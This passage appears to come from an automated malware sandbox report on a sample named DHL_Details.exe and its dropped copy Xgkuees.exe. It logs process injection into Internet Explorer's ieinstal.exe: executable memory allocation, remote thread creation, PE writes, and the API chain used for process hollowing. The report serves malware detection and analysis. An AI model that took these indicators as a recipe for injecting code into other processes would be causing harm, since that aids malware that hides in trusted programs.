Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AD0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AE0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AF0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2B00000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2B10000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2B20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2B30000 protect: page execute and read and writeJump to behavior
Contains functionality to inject code into remote processesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040F13D _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,12_2_0040F13D
Creates a thread in another existing process (thread injection)Show sources
Source: C:\Users\user\Desktop\DHL_Details.exeThread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 30D0000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeThread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 3190000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeThread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 31D0000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeThread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 31F0000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeThread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2570000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeThread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2830000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeThread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2870000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeThread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2890000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeThread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2A10000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeThread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2AD0000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeThread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2B10000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeThread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2B30000Jump to behavior
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Desktop\DHL_Details.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 value starts with: 4D5AJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 value starts with: 4D5AJump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\Desktop\DHL_Details.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 30D0000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3160000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3170000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3180000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3190000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31A0000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31B0000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31C0000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31D0000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31E0000Jump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31F0000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2570000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2800000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2810000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2820000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2830000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2840000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2850000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2860000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2870000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2880000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2890000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2A10000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AA0000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AB0000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AC0000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AD0000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AE0000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AF0000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2B00000Jump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exe